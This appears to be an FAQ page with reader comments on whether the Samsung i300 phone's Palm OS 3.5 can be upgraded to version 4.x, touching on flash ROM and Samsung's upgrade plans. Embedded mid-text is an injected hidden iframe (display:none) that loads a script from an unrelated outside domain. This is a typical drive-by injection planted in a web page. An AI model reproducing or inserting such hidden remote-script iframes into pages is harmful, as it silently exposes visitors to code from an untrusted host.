Can I upgrade the version of Palm OS on the i300?

No. The version of Palm OS 3.5 that the i300 runs includes extended features developed by Samsung expressly for this phone. Versions of Palm OS 4.x intended for other handheld devices do not include Samsung's extensions. Attempts to upgrade the OS on the i300 will therefore not function properly and will likely render your phone useless.

Current information indicates that the OS on the i300 is 'hard-coded' into the phone and not upgradeable anyway. Samsung has not released any information on upgrading the phone's OS.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Apparently, the i300 has flash rom after all... otherwise, Jack Flash wouldn't work, and apparently it does

On the other hand, we're still entirely dependent upon Samsung for OS upgrades, so there's probably a greater likelihood of Miami seeing four feet of snow than i300 owners seeing OS4.x

Still, the fact that it IS physically possible after all is comforting, in an anticlimactic Samsung kind of way...

If the M330 comes out with 4.0, then Samsung could have some sort of upgrade plan for I300 users.

At least it is a possibility....guess we'll find out in April or shortly thereafter.
